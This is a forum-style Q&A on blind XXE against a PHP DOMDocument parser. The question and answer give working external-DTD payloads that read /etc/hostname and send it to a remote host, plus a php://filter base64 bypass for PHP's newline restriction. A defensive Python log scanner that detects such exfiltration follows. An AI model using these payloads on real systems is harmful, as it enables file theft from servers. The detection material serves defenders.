PHP Blind XXE Exploitation: Invalid URI in Entity

Information Security Asked by user3207874 on October 28, 2021

When attempting to exploit blind XXE as explained in this article, I got an error in my Apache logs:

PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity

The DTD file:

<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY % send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

The request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>

Why can’t I send the /etc/hostname?

One Answer

I found out the issue is that /etc/hostname has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.

I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.

In fact, you can use the php:// protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

Answered by user3207874 on October 28, 2021
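From the defender's side, the useful trace of the attempt above is the libxml warning PHP writes to the error log, which names the remote host the parser was coaxed into contacting. The following is an added example, not code from the question or the answer: a small Python scanner over constructed PHP error-log lines that flags DOMDocument warnings referencing a remote URI and, for the php://filter variant, decodes the base64 path segment back into the file content it carried. The log line layout, the script path and the client addresses are assumptions.

```python
import base64
import binascii
import re

# Warnings PHP's DOMDocument emits (via libxml2) while resolving an external DTD
# or parameter entity; the URI they quote is the OOB channel the payload opened.
WARNING_RE = re.compile(r"DOMDocument::load\w*\(\): (?P<msg>.*)")
URI_RE = re.compile(r"https?://(?P<host>[^/\s\"']+)(?P<path>/[^\s\"']*)?")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_if_text(segment):
    """Return decoded text if `segment` is base64 of printable text (php://filter style), else None."""
    if len(segment) < 8 or len(segment) % 4 or not B64_RE.match(segment):
        return None
    try:
        text = base64.b64decode(segment, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c.isspace() for c in text) else None


def scan_php_error_log(lines):
    """Flag DOMDocument warnings that name a remote URI; decode a base64 last path segment."""
    findings = []
    for line in lines:
        w = WARNING_RE.search(line)
        u = URI_RE.search(w.group("msg")) if w else None
        if not u:
            continue  # parse error without a remote URI: noisy, but not an OOB fetch
        last = (u.group("path") or "/").rstrip("/").rsplit("/", 1)[-1]
        findings.append({"remote_host": u.group("host"), "uri": u.group(0),
                         "decoded": decode_if_text(last), "message": w.group("msg")})
    return findings


# Constructed sample lines: the first mirrors the warning quoted in the question,
# the second the php://filter variant from the answer (base64 of "82a3ccab632c\n").
SAMPLE_LOG = [
    "[Thu Oct 28 10:11:12 2021] [php:warn] [client 10.0.0.5:54321] PHP Warning:  "
    "DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity, "
    "line: 2 in /var/www/html/login.php on line 17",
    "[Thu Oct 28 10:11:13 2021] [php:warn] [client 10.0.0.5:54321] PHP Warning:  "
    "DOMDocument::loadXML(): I/O warning : failed to load external entity \"http://192.168.6.1/"
    + base64.b64encode(b"82a3ccab632c\n").decode() + "\" in /var/www/html/login.php on line 17",
    "[Thu Oct 28 10:11:14 2021] [php:warn] [client 10.0.0.6:40000] PHP Warning:  "
    "DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1",
]
```

Run `scan_php_error_log(SAMPLE_LOG)`: the first line is reported with the raw hostname as the path (it is not valid base64 text), the second decodes to the hostname plus the trailing newline that broke the plain URI, and the third is ignored because it names no remote host.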
